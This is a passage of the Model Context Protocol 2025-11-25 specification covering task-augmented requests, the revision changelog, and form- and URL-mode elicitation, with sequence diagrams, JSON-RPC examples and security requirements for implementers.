S->>C: completed
deactivate S
Note over C,S: 3. Result Retrieval
C->>S: tasks/result (taskId)
activate S
S->>C: Result content
deactivate S
Note over C,S: 4. Cleanup
Note over S: After ttl period from creation, task is cleaned up
```
### Task-Augmented Tool Call With Elicitation
```mermaid theme={null}
sequenceDiagram
participant U as User
participant LLM
participant C as Client (Requestor)
participant S as Server (Receiver)
Note over LLM,C: LLM initiates request
LLM->>C: Request operation
Note over C,S: Client augments with task
C->>S: tools/call (ttl: 3600000)
activate S
S->>C: CreateTaskResult (task-123, status: working)
deactivate S
Note over LLM,C: Client continues processing other requests while task executes in background
LLM->>C: Request other operation
C->>LLM: Other operation result
Note over C,S: Client polls for status
C->>S: tasks/get (task-123)
activate S
S->>C: working
deactivate S
Note over S: Server needs information from client Task moves to input_required
Note over C,S: Client polls and discovers input_required
C->>S: tasks/get (task-123)
activate S
S->>C: input_required
deactivate S
Note over C,S: Client opens result stream
C->>S: tasks/result (task-123)
activate S
S->>C: elicitation/create (related-task: task-123)
activate C
C->>U: Prompt user for input
U->>C: Provide information
C->>S: elicitation response (related-task: task-123)
deactivate C
deactivate S
Note over C,S: Client closes result stream and resumes polling
Note over S: Task continues processing... Task moves back to working
C->>S: tasks/get (task-123)
activate S
S->>C: working
deactivate S
Note over S: Task completes
Note over C,S: Client polls and discovers completion
C->>S: tasks/get (task-123)
activate S
S->>C: completed
deactivate S
Note over C,S: Client retrieves final results
C->>S: tasks/result (task-123)
activate S
S->>C: Result content
deactivate S
C->>LLM: Process result
Note over S: Results retained for ttl period from creation
```
### Task-Augmented Sampling Request
```mermaid theme={null}
sequenceDiagram
participant U as User
participant LLM
participant C as Client (Receiver)
participant S as Server (Requestor)
Note over S: Server decides to initiate request
Note over S,C: Server requests client operation (task-augmented)
S->>C: sampling/createMessage (ttl: 3600000)
activate C
C->>S: CreateTaskResult (request-789, status: working)
deactivate C
Note over S: Server continues processing while waiting for result
Note over S,C: Server polls for result
S->>C: tasks/get (request-789)
activate C
C->>S: working
deactivate C
Note over C,U: Client may present request to user
C->>U: Review request
U->>C: Approve request
Note over C,LLM: Client may involve LLM
C->>LLM: Request completion
LLM->>C: Return completion
Note over C,U: Client may present result to user
C->>U: Review result
U->>C: Approve result
Note over S,C: Server polls and discovers completion
S->>C: tasks/get (request-789)
activate C
C->>S: completed
deactivate C
Note over S,C: Server retrieves result
S->>C: tasks/result (request-789)
activate C
C->>S: Result content
deactivate C
Note over S: Server continues processing
Note over C: Results retained for ttl period from creation
```
### Task Cancellation Flow
```mermaid theme={null}
sequenceDiagram
participant C as Client (Requestor)
participant S as Server (Receiver)
Note over C,S: 1. Task Creation
C->>S: tools/call (request ID: 42, ttl: 60000)
activate S
S->>C: CreateTaskResult (task-123, status: working)
deactivate S
Note over C,S: 2. Task Processing
C->>S: tasks/get (task-123)
activate S
S->>C: working
deactivate S
Note over C,S: 3. Client Cancellation
Note over C: User requests cancellation
C->>S: tasks/cancel (taskId: task-123)
activate S
Note over S: Server stops execution (best effort)
Note over S: Task moves to cancelled status
S->>C: Task (status: cancelled)
deactivate S
Note over C: Client receives confirmation
Note over S: Server may delete task at its discretion
```
## Data Types
### Task
A task represents the execution state of a request. The task state includes:
* `taskId`: Unique identifier for the task
* `status`: Current state of the task execution
* `statusMessage`: Optional human-readable message describing the current state (can be present for any status, including error details for failed tasks)
* `createdAt`: ISO 8601 timestamp when the task was created
* `ttl`: Time in milliseconds from creation before task may be deleted
* `pollInterval`: Suggested time in milliseconds between status checks
* `lastUpdatedAt`: ISO 8601 timestamp when the task status was last updated
### Task Status
Tasks can be in one of the following states:
* `working`: The request is currently being processed.
* `input_required`: The receiver needs input from the requestor. The requestor should call `tasks/result` to receive input requests, even though the task has not reached a terminal state.
* `completed`: The request completed successfully and results are available.
* `failed`: The associated request did not complete successfully. For tool calls specifically, this includes cases where the tool call result has `isError` set to true.
* `cancelled`: The request was cancelled before completion.
### Task Parameters
When augmenting a request with task execution, the `task` field is included in the request parameters:
```json theme={null}
{
"task": {
"ttl": 60000
}
}
```
Fields:
* `ttl` (number, optional): Requested duration in milliseconds to retain task from creation
### Related Task Metadata
All requests, responses, and notifications associated with a task **MUST** include the `io.modelcontextprotocol/related-task` key in `_meta`:
```json theme={null}
{
"io.modelcontextprotocol/related-task": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840"
}
}
```
This associates messages with their originating task across the entire request lifecycle.
For the `tasks/get`, `tasks/list`, and `tasks/cancel` operations, requestors and receivers **SHOULD NOT** include this metadata in their messages, as the `taskId` is already present in the message structure.
The `tasks/result` operation **MUST** include this metadata in its response, as the result structure itself does not contain the task ID.
## Error Handling
Tasks use two error reporting mechanisms:
1. **Protocol Errors**: Standard JSON-RPC errors for protocol-level issues
2. **Task Execution Errors**: Errors in the underlying request execution, reported through task status
### Protocol Errors
Receivers **MUST** return standard JSON-RPC errors for the following protocol error cases:
* Invalid or nonexistent `taskId` in `tasks/get`, `tasks/result`, or `tasks/cancel`: `-32602` (Invalid params)
* Invalid or nonexistent cursor in `tasks/list`: `-32602` (Invalid params)
* Attempt to cancel a task already in a terminal status: `-32602` (Invalid params)
* Internal errors: `-32603` (Internal error)
Additionally, receivers **MAY** return the following errors:
* Non-task-augmented request when receiver requires task augmentation for that request type: `-32600` (Invalid request)
Receivers **SHOULD** provide informative error messages to describe the cause of errors.
**Example: Task augmentation required**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"error": {
"code": -32600,
"message": "Task augmentation required for tools/call requests"
}
}
```
**Example: Task not found**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 70,
"error": {
"code": -32602,
"message": "Failed to retrieve task: Task not found"
}
}
```
**Example: Task expired**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 71,
"error": {
"code": -32602,
"message": "Failed to retrieve task: Task has expired"
}
}
```
Receivers are not required to retain tasks indefinitely. It is compliant behavior for a receiver to return an error stating the task cannot be found if it has purged an expired task.
**Example: Task cancellation rejected (already terminal)**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 74,
"error": {
"code": -32602,
"message": "Cannot cancel task: already in terminal status 'completed'"
}
}
```
### Task Execution Errors
When the underlying request does not complete successfully, the task moves to the `failed` status. This includes JSON-RPC protocol errors during request execution, or for tool calls specifically, when the tool result has `isError` set to true. The `tasks/get` response **SHOULD** include a `statusMessage` field with diagnostic information about the failure.
**Example: Task with execution error**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 4,
"result": {
"taskId": "786512e2-9e0d-44bd-8f29-789f820fe840",
"status": "failed",
"createdAt": "2025-11-25T10:30:00Z",
"lastUpdatedAt": "2025-11-25T10:40:00Z",
"ttl": 30000,
"statusMessage": "Tool execution failed: API rate limit exceeded"
}
}
```
For tasks that wrap tool call requests, when the tool result has `isError` set to `true`, the task should reach `failed` status.
The `tasks/result` endpoint returns exactly what the underlying request would have returned:
* If the underlying request resulted in a JSON-RPC error, `tasks/result` **MUST** return that same JSON-RPC error.
* If the request completed with a JSON-RPC response, `tasks/result` **MUST** return a successful JSON-RPC response containing that result.
## Security Considerations
### Task Isolation and Access Control
Task IDs are the primary mechanism for accessing task state and results. Without proper access controls, any party that can guess or obtain a task ID could potentially access sensitive information or manipulate tasks they did not create.
When an authorization context is provided, receivers **MUST** bind tasks to said context.
Context-binding is not practical for all applications. Some MCP servers operate in environments without authorization, such as single-user tools, or use transports that don't support authorization.
In these scenarios, receivers **SHOULD** document this limitation clearly, as task results may be accessible to any requestor that can guess the task ID.
If context-binding is unavailable, receivers **MUST** generate cryptographically secure task IDs with enough entropy to prevent guessing and should consider using shorter TTL durations to reduce the exposure window.
If context-binding is available, receivers **MUST** reject `tasks/get`, `tasks/result`, and `tasks/cancel` requests for tasks that do not belong to the same authorization context as the requestor. For `tasks/list` requests, receivers **MUST** ensure the returned task list includes only tasks associated with the requestor's authorization context.
Additionally, receivers **SHOULD** implement rate limiting on task operations to prevent denial-of-service and enumeration attacks.
### Resource Management
1. Receivers **SHOULD**:
1. Enforce limits on concurrent tasks per requestor
2. Enforce maximum `ttl` durations to prevent indefinite resource retention
3. Clean up expired tasks promptly to free resources
4. Document maximum supported `ttl` duration
5. Document maximum concurrent tasks per requestor
6. Implement monitoring and alerting for resource usage
### Audit and Logging
1. Receivers **SHOULD**:
1. Log task creation, completion, and retrieval events for audit purposes
2. Include auth context in logs when available
3. Monitor for suspicious patterns (e.g., many failed task lookups, excessive polling)
2. Requestors **SHOULD**:
1. Log task lifecycle events for debugging and audit purposes
2. Track task IDs and their associated operations
# Key Changes
Source: https://modelcontextprotocol.io/specification/2025-11-25/changelog
This document lists changes made to the Model Context Protocol (MCP) specification since
the previous revision, [2025-06-18](/specification/2025-06-18).
## Major changes
1. Enhance authorization server discovery with support for [OpenID Connect Discovery 1.0](https://openid.net/specs/openid-connect-discovery-1_0.html). (PR [#797](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/797))
2. Allow servers to expose icons as additional metadata for tools, resources, resource templates, and prompts ([SEP-973](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/973)).
3. Enhance authorization flows with incremental scope consent via `WWW-Authenticate` ([SEP-835](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/835))
4. Provide guidance on tool names ([SEP-986](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1603))
5. Update `ElicitResult` and `EnumSchema` to use a more standards-based approach and support titled, untitled, single-select, and multi-select enums ([SEP-1330](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1330)).
6. Added support for [URL mode elicitation](/specification/2025-11-25/client/elicitation#url-elicitation-requests) ([SEP-1036](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/887))
7. Add tool calling support to sampling via `tools` and `toolChoice` parameters ([SEP-1577](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1577))
8. Add support for OAuth Client ID Metadata Documents as a recommended client registration mechanism ([SEP-991](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/991), PR [#1296](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1296))
9. Add experimental support for [tasks](/specification/2025-11-25/basic/utilities/tasks) to enable tracking durable requests with polling and deferred result retrieval ([SEP-1686](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1686)).
## Minor changes
1. Clarify that servers using stdio transport may use stderr for all types of logging, not just error messages (PR [#670](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/670)).
2. Add optional `description` field to `Implementation` interface to align with MCP registry server.json format and provide human-readable context during initialization.
3. Clarify that servers must respond with HTTP 403 Forbidden for invalid Origin headers in Streamable HTTP transport. (PR [#1439](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1439))
4. Updated the [Security Best Practices guidance](https://modelcontextprotocol.io/specification/draft/basic/security_best_practices).
5. Clarify that input validation errors should be returned as Tool Execution Errors rather than Protocol Errors to enable model self-correction ([SEP-1303](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1303)).
6. Support polling SSE streams by allowing servers to disconnect at will ([SEP-1699](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1699)).
7. Clarify SEP-1699: GET streams support polling, resumption always via GET regardless of stream origin, event IDs should encode stream identity, disconnection includes server-initiated closure (Issue [#1847](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1847)).
8. Align OAuth 2.0 Protected Resource Metadata discovery with RFC 9728, making `WWW-Authenticate` header optional with fallback to `.well-known` endpoint ([SEP-985](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/985)).
9. Add support for default values in all primitive types (string, number, enum) for elicitation schemas ([SEP-1034](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1034)).
10. Establish JSON Schema 2020-12 as the default dialect for MCP schema definitions ([SEP-1613](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1613)).
## Other schema changes
1. Decouple request payloads from RPC method definitions into standalone parameter schemas. ([SEP-1319](https://github.com/modelcontextprotocol/specification/issues/1319), PR [#1284](https://github.com/modelcontextprotocol/specification/pull/1284))
## Governance and process updates
1. Formalize Model Context Protocol governance structure ([SEP-932](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/932)).
2. Establish shared communication practices and guidelines for the MCP community ([SEP-994](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/994)).
3. Formalize Working Groups and Interest Groups in MCP governance ([SEP-1302](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1302)).
4. Establish SDK tiering system with clear requirements for feature support and maintenance commitments ([SEP-1730](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1730)).
## Full changelog
For a complete list of all changes that have been made since the last protocol revision,
[see GitHub](https://github.com/modelcontextprotocol/specification/compare/2025-06-18...2025-11-25).
# Elicitation
Source: https://modelcontextprotocol.io/specification/2025-11-25/client/elicitation
**Protocol Revision**: 2025-11-25
The Model Context Protocol (MCP) provides a standardized way for servers to request additional
information from users through the client during interactions. This flow allows clients to
maintain control over user interactions and data sharing while enabling servers to gather
necessary information dynamically.
Elicitation supports two modes:
* **Form mode**: Servers can request structured data from users with optional JSON schemas to validate responses
* **URL mode**: Servers can direct users to external URLs for sensitive interactions that must *not* pass through the MCP client
## User Interaction Model
Elicitation in MCP allows servers to implement interactive workflows by enabling user input
requests to occur *nested* inside other MCP server features.
Implementations are free to expose elicitation through any interface pattern that suits
their needs—the protocol itself does not mandate any specific user interaction
model.
For trust & safety and security:
* Servers **MUST NOT** use form mode elicitation to request sensitive information
* Servers **MUST** use URL mode for interactions involving sensitive information, such as credentials
MCP clients **MUST**:
* Provide UI that makes it clear which server is requesting information
* Respect user privacy and provide clear decline and cancel options
* For form mode, allow users to review and modify their responses before sending
* For URL mode, clearly display the target domain/host and gather user consent before navigation to the target URL
## Capabilities
Clients that support elicitation **MUST** declare the `elicitation` capability during
[initialization](../basic/lifecycle#initialization):
```json theme={null}
{
"capabilities": {
"elicitation": {
"form": {},
"url": {}
}
}
}
```
For backwards compatibility, an empty capabilities object is equivalent to declaring support for `form` mode only:
```jsonc theme={null}
{
"capabilities": {
"elicitation": {}, // Equivalent to { "form": {} }
},
}
```
Clients declaring the `elicitation` capability **MUST** support at least one mode (`form` or `url`).
Servers **MUST NOT** send elicitation requests with modes that are not supported by the client.
## Protocol Messages
### Elicitation Requests
To request information from a user, servers send an `elicitation/create` request.
All elicitation requests **MUST** include the following parameters:
| Name | Type | Options | Description |
| --------- | ------ | ------------- | -------------------------------------------------------------------------------------- |
| `mode` | string | `form`, `url` | The mode of the elicitation. Optional for form mode (defaults to `"form"` if omitted). |
| `message` | string | | A human-readable message explaining why the interaction is needed. |
The `mode` parameter specifies the type of elicitation:
* `"form"`: In-band structured data collection with optional schema validation. Data is exposed to the client.
* `"url"`: Out-of-band interaction via URL navigation. Data (other than the URL itself) is **not** exposed to the client.
For backwards compatibility, servers **MAY** omit the `mode` field for form mode elicitation requests. Clients **MUST** treat requests without a `mode` field as form mode.
### Form Mode Elicitation Requests
Form mode elicitation allows servers to collect structured data directly through the MCP client.
Form mode elicitation requests **MUST** either specify `mode: "form"` or omit the `mode` field, and include these additional parameters:
| Name | Type | Description |
| ----------------- | ------ | -------------------------------------------------------------- |
| `requestedSchema` | object | A JSON Schema defining the structure of the expected response. |
#### Requested Schema
The `requestedSchema` parameter allows servers to define the structure of the expected
response using a restricted subset of JSON Schema.
To simplify client user experience, form mode elicitation schemas are limited to flat objects
with primitive properties only.
The schema is restricted to these primitive types:
1. **String Schema**
```json theme={null}
{
"type": "string",
"title": "Display Name",
"description": "Description text",
"minLength": 3,
"maxLength": 50,
"pattern": "^[A-Za-z]+$",
"format": "email",
"default": "user@example.com"
}
```
Supported formats: `email`, `uri`, `date`, `date-time`
2. **Number Schema**
```json theme={null}
{
"type": "number", // or "integer"
"title": "Display Name",
"description": "Description text",
"minimum": 0,
"maximum": 100,
"default": 50
}
```
3. **Boolean Schema**
```json theme={null}
{
"type": "boolean",
"title": "Display Name",
"description": "Description text",
"default": false
}
```
4. **Enum Schema**
Single-select enum (without titles):
```json theme={null}
{
"type": "string",
"title": "Color Selection",
"description": "Choose your favorite color",
"enum": ["Red", "Green", "Blue"],
"default": "Red"
}
```
Single-select enum (with titles):
```json theme={null}
{
"type": "string",
"title": "Color Selection",
"description": "Choose your favorite color",
"oneOf": [
{ "const": "#FF0000", "title": "Red" },
{ "const": "#00FF00", "title": "Green" },
{ "const": "#0000FF", "title": "Blue" }
],
"default": "#FF0000"
}
```
Multi-select enum (without titles):
```json theme={null}
{
"type": "array",
"title": "Color Selection",
"description": "Choose your favorite colors",
"minItems": 1,
"maxItems": 2,
"items": {
"type": "string",
"enum": ["Red", "Green", "Blue"]
},
"default": ["Red", "Green"]
}
```
Multi-select enum (with titles):
```json theme={null}
{
"type": "array",
"title": "Color Selection",
"description": "Choose your favorite colors",
"minItems": 1,
"maxItems": 2,
"items": {
"anyOf": [
{ "const": "#FF0000", "title": "Red" },
{ "const": "#00FF00", "title": "Green" },
{ "const": "#0000FF", "title": "Blue" }
]
},
"default": ["#FF0000", "#00FF00"]
}
```
Clients can use this schema to:
1. Generate appropriate input forms
2. Validate user input before sending
3. Provide better guidance to users
All primitive types support optional default values to provide sensible starting points. Clients that support defaults SHOULD pre-populate form fields with these values.
Note that complex nested structures, arrays of objects (beyond enums), and other advanced JSON Schema features are intentionally not supported to simplify client user experience.
#### Example: Simple Text Request
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "elicitation/create",
"params": {
"mode": "form",
"message": "Please provide your GitHub username",
"requestedSchema": {
"type": "object",
"properties": {
"name": {
"type": "string"
}
},
"required": ["name"]
}
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"action": "accept",
"content": {
"name": "octocat"
}
}
}
```
#### Example: Structured Data Request
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 2,
"method": "elicitation/create",
"params": {
"mode": "form",
"message": "Please provide your contact information",
"requestedSchema": {
"type": "object",
"properties": {
"name": {
"type": "string",
"description": "Your full name"
},
"email": {
"type": "string",
"format": "email",
"description": "Your email address"
},
"age": {
"type": "number",
"minimum": 18,
"description": "Your age"
}
},
"required": ["name", "email"]
}
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 2,
"result": {
"action": "accept",
"content": {
"name": "Monalisa Octocat",
"email": "octocat@github.com",
"age": 30
}
}
}
```
### URL Mode Elicitation Requests
**New feature:** URL mode elicitation is introduced in the `2025-11-25` version of the MCP specification. Its design and implementation may change in future protocol revisions.
URL mode elicitation enables servers to direct users to external URLs for out-of-band interactions that must not pass through the MCP client. This is essential for auth flows, payment processing, and other sensitive or secure operations.
URL mode elicitation requests **MUST** specify `mode: "url"`, a `message`, and include these additional parameters:
| Name | Type | Description |
| --------------- | ------ | ----------------------------------------- |
| `url` | string | The URL that the user should navigate to. |
| `elicitationId` | string | A unique identifier for the elicitation. |
The `url` parameter **MUST** contain a valid URL.
**Important**: URL mode elicitation is *not* for authorizing the MCP client's
access to the MCP server (that's handled by [MCP
authorization](../basic/authorization)). Instead, it's used when the MCP
server needs to obtain sensitive information or third-party authorization on
behalf of the user. The MCP client's bearer token remains unchanged. The
client's only responsibility is to provide the user with context about the
elicitation URL the server wants them to open.
#### Example: Request Sensitive Data
This example shows a URL mode elicitation request directing the user to a secure URL where they can provide sensitive information (an API key, for example).
The same request could direct the user into an OAuth authorization flow, or a payment flow. The only difference is the URL and the message.
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 3,
"method": "elicitation/create",
"params": {
"mode": "url",
"elicitationId": "550e8400-e29b-41d4-a716-446655440000",
"url": "https://mcp.example.com/ui/set_api_key",
"message": "Please provide your API key to continue."
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 3,
"result": {
"action": "accept"
}
}
```
The response with `action: "accept"` indicates that the user has consented to the
interaction. It does not mean that the interaction is complete. The interaction occurs out
of band and the client is not aware of the outcome until and unless the server sends a notification indicating completion.
### Completion Notifications for URL Mode Elicitation
Servers **MAY** send a `notifications/elicitation/complete` notification when an
out-of-band interaction started by URL mode elicitation is completed. This allows clients to react programmatically if appropriate.
Servers sending notifications:
* **MUST** only send the notification to the client that initiated the elicitation request.
* **MUST** include the `elicitationId` established in the original `elicitation/create` request.
Clients:
* **MUST** ignore notifications referencing unknown or already-completed IDs.
* **MAY** wait for this notification to automatically retry requests that received a [URLElicitationRequiredError](#error-handling), update the user interface, or otherwise continue an interaction.
* **SHOULD** still provide manual controls that let the user retry or cancel the original request (or otherwise resume interacting with the client) if the notification never arrives.
#### Example
```json theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/elicitation/complete",
"params": {
"elicitationId": "550e8400-e29b-41d4-a716-446655440000"
}
}
```
### URL Elicitation Required Error
When a request cannot be processed until an elicitation is completed, the server **MAY** return a [`URLElicitationRequiredError`](#error-handling) (code `-32042`) to indicate to the client that a URL mode elicitation is required. The server **MUST NOT** return this error except when URL mode elicitation is required.
The error **MUST** include a list of elicitations that are required to complete before the original can be retried.
Any elicitations returned in the error **MUST** be URL mode elicitations and have an `elicitationId` property.
**Error Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 2,
"error": {
"code": -32042, // URL_ELICITATION_REQUIRED
"message": "This request requires more information.",
"data": {
"elicitations": [
{
"mode": "url",
"elicitationId": "550e8400-e29b-41d4-a716-446655440000",
"url": "https://mcp.example.com/connect?elicitationId=550e8400-e29b-41d4-a716-446655440000",
"message": "Authorization is required to access your Example Co files."
}
]
}
}
}
```
## Message Flow
### Form Mode Flow
```mermaid theme={null}
sequenceDiagram
participant User
participant Client
participant Server
Note over Server: Server initiates elicitation
Server->>Client: elicitation/create (mode: form)
Note over User,Client: Present elicitation UI
User-->>Client: Provide requested information
Note over Server,Client: Complete request
Client->>Server: Return user response
Note over Server: Continue processing with new information
```
### URL Mode Flow
```mermaid theme={null}
sequenceDiagram
participant UserAgent as User Agent (Browser)
participant User
participant Client
participant Server
Note over Server: Server initiates elicitation
Server->>Client: elicitation/create (mode: url)
Client->>User: Present consent to open URL
User-->>Client: Provide consent
Client->>UserAgent: Open URL
Client->>Server: Accept response
Note over User,UserAgent: User interaction
UserAgent-->>Server: Interaction complete
Server-->>Client: notifications/elicitation/complete (optional)
Note over Server: Continue processing with new information
```
### URL Mode With Elicitation Required Error Flow
```mermaid theme={null}
sequenceDiagram
participant UserAgent as User Agent (Browser)
participant User
participant Client
participant Server
Client->>Server: tools/call
Note over Server: Server needs authorization
Server->>Client: URLElicitationRequiredError
Note over Client: Client notes the original request can be retried after elicitation
Client->>User: Present consent to open URL
User-->>Client: Provide consent
Client->>UserAgent: Open URL
Note over User,UserAgent: User interaction
UserAgent-->>Server: Interaction complete
Server-->>Client: notifications/elicitation/complete (optional)
Client->>Server: Retry tools/call (optional)
```
## Response Actions
Elicitation responses use a three-action model to clearly distinguish between different user actions. These actions apply to both form and URL elicitation modes.
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"action": "accept", // or "decline" or "cancel"
"content": {
"propertyName": "value",
"anotherProperty": 42
}
}
}
```
The three response actions are:
1. **Accept** (`action: "accept"`): User explicitly approved and submitted with data
* For form mode: The `content` field contains the submitted data matching the requested schema
* For URL mode: The `content` field is omitted
* Example: User clicked "Submit", "OK", "Confirm", etc.
2. **Decline** (`action: "decline"`): User explicitly declined the request
* The `content` field is typically omitted
* Example: User clicked "Reject", "Decline", "No", etc.
3. **Cancel** (`action: "cancel"`): User dismissed without making an explicit choice
* The `content` field is typically omitted
* Example: User closed the dialog, clicked outside, pressed Escape, browser failed to load, etc.
Servers should handle each state appropriately:
* **Accept**: Process the submitted data
* **Decline**: Handle explicit decline (e.g., offer alternatives)
* **Cancel**: Handle dismissal (e.g., prompt again later)
## Implementation Considerations
### Statefulness
Most practical uses of elicitation require that the server maintain state about users:
* Whether required information has been collected (e.g., the user's display name via form mode elicitation)
* Status of resource access (e.g., API keys or a payment flow via URL mode elicitation)
Servers implementing elicitation **MUST** securely associate this state with individual users following the guidelines in the [security best practices](../basic/security_best_practices) document. Specifically:
* State **MUST NOT** be associated with session IDs alone
* State storage **MUST** be protected against unauthorized access
* For remote MCP servers, user identification **MUST** be derived from credentials acquired via [MCP authorization](../basic/authorization) when possible (e.g. `sub` claim)
The examples in this section are non-normative and illustrate potential uses
of elicitation. Implementers should adapt these patterns to their specific
requirements while maintaining security best practices.
### URL Mode Elicitation for Sensitive Data
For servers that interact with external APIs requiring sensitive information (e.g., credentials, payment information), URL mode elicitation provides a secure mechanism for users to provide this information without exposing it to the MCP client.
In this pattern:
1. The server directs users to a secure web page (served over HTTPS)
2. The page presents a branded form UI on a domain the user trusts
3. Users enter sensitive credentials directly into the secure form
4. The server stores credentials securely, bound to the user's identity
5. Subsequent MCP requests use these stored credentials for API access
This approach ensures that sensitive credentials never pass through the LLM context, MCP client or any intermediate MCP servers, reducing the risk of exposure through client-side logging or other attack vectors.
### URL Mode Elicitation for OAuth Flows
URL mode elicitation enables a pattern where MCP servers act as OAuth clients to third-party resource servers.
Authorization with external APIs enabled by URL mode elicitation is separate from [MCP authorization](../basic/authorization). MCP servers **MUST NOT** rely on URL mode elicitation to authorize users for themselves.
#### Understanding the Distinction
* **MCP Authorization**: Required OAuth flow between the MCP client and MCP server (covered in the [authorization specification](../basic/authorization))
* **External (third-party) Authorization**: Optional authorization between the MCP server and a third-party resource server, initiated via URL mode elicitation
In external authorization, the server acts as both:
* An OAuth resource server (to the MCP client)
* An OAuth client (to the third-party resource server)
Example scenario:
* An MCP client connects to an MCP server
* The MCP server integrates with various different third-party services
* When the MCP client calls a tool that requires access to a third-party service, the MCP server needs credentials for that service
The critical security requirements are:
1. **The third-party credentials MUST NOT transit through the MCP client**: The client must never see third-party credentials to protect the security boundary
2. **The MCP server MUST NOT use the client's credentials for the third-party service**: That would be [token passthrough](../basic/security_best_practices#token-passthrough), which is forbidden
3. **The user MUST authorize the MCP server directly**: The interaction happens outside the MCP protocol, without involving the MCP client
4. **The MCP server is responsible for tokens**: The MCP server is responsible for storing and managing the third-party tokens obtained through the URL mode elicitation (in other words, the MCP server must be stateful).
Credentials obtained via URL mode elicitation are distinct from the MCP server credentials used by the MCP client. The MCP server **MUST NOT** transmit credentials obtained through URL mode elicitation to the MCP client.
For additional background, refer to the [token passthrough
section](../basic/security_best_practices#token-passthrough) of the Security
Best Practices document to understand why MCP servers cannot act as
pass-through proxies.
#### Implementation Pattern
When implementing external authorization via URL mode elicitation:
1. The MCP server generates an authorization URL, acting as an OAuth client to the third-party service
2. The MCP server stores internal state that associates (binds) the elicitation request with the user's identity.
3. The MCP server sends a URL mode elicitation request to the client with a URL that can start the authorization flow.
4. The user completes the OAuth flow directly with the third-party authorization server
5. The third-party authorization server redirects back to the MCP server
6. The MCP server securely stores the third-party tokens, bound to the user's identity
7. Future MCP requests can leverage these stored tokens for API access to the third-party resource server
The following is a non-normative example of how this pattern could be implemented:
```mermaid theme={null}
sequenceDiagram
participant User
participant UserAgent as User Agent (Browser)
participant 3AS as 3rd Party AS
participant 3RS as 3rd Party RS
participant Client as MCP Client
participant Server as MCP Server
Client->>Server: tools/call
Note over Server: Needs 3rd-party authorization for user
Note over Server: Store state (bind the elicitation request to the user)
Server->>Client: URLElicitationRequiredError (mode: "url", url: "https://mcp.example.com/connect?...")
Note over Client: Client notes the tools/call request can be retried later
Client->>User: Present consent to open URL
User->>Client: Provide consent
Client->>UserAgent: Open URL
Client->>Server: Accept response
UserAgent->>Server: Load connect route
Note over Server: Confirm: user is logged into MCP Server or MCP AS Confirm: elicitation user matches session user
Server->>UserAgent: Redirect to third-party authorization endpoint
UserAgent->>3AS: Load authorize route
Note over 3AS,User: User interaction (OAuth flow): User consents to scoped MCP Server access
3AS->>UserAgent: redirect to MCP Server's redirect_uri
UserAgent->>Server: load redirect_uri page
Note over Server: Confirm: redirect_uri belongs to MCP Server
Server->>3AS: Exchange authorization code for OAuth tokens
3AS->>Server: Grants tokens
Note over Server: Bind tokens to MCP user identity
Server-->>Client: notifications/elicitation/complete (optional)
Client->>Server: Retry tools/call
Note over Server: Retrieve token bound to user identity
Server->>3RS: Call 3rd-party API
```
This pattern maintains clear security boundaries while enabling rich integrations with third-party services that require user authorization.
## Error Handling
Servers **MUST** return standard JSON-RPC errors for common failure cases:
* When a request cannot be processed until an elicitation is completed: `-32042` (`URLElicitationRequiredError`)
Clients **MUST** return standard JSON-RPC errors for common failure cases:
* Server sends an `elicitation/create` request with a mode not declared in client capabilities: `-32602` (Invalid params)
## Security Considerations
1. Servers **MUST** bind elicitation requests to the client and user identity
2. Clients **MUST** provide clear indication of which server is requesting information
3. Clients **SHOULD** implement user approval controls
4. Clients **SHOULD** allow users to decline elicitation requests at any time
5. Clients **SHOULD** implement rate limiting
6. Clients **SHOULD** present elicitation requests in a way that makes it clear what information is being requested and why
### Safe URL Handling
MCP servers requesting elicitation:
1. **MUST NOT** include sensitive information about the end-user, including credentials, personal identifiable information, etc., in the URL sent to the client in a URL elicitation request.
2. **MUST NOT** provide a URL which is pre-authenticated to access a protected resource, as the URL could be used to impersonate the user by a malicious client.
3. **SHOULD NOT** include URLs intended to be clickable in any field of a form mode elicitation request.
4. **SHOULD** use HTTPS URLs for non-development environments.
These server requirements ensure that client implementations have clear rules about when to present a URL to the user, so that the client-side rules (below) can be consistently applied.
Clients implementing URL mode elicitation **MUST** handle URLs carefully to prevent users from unknowingly clicking malicious links.
When handling URL mode elicitation requests, MCP clients:
1. **MUST NOT** automatically pre-fetch the URL or any of its metadata.
2. **MUST NOT** open the URL without explicit consent from the user.
3. **MUST** show the full URL to the user for examination before consent.
4. **MUST** open the URL provided by the server in a secure manner that does not enable the client or LLM to inspect the content or user inputs.
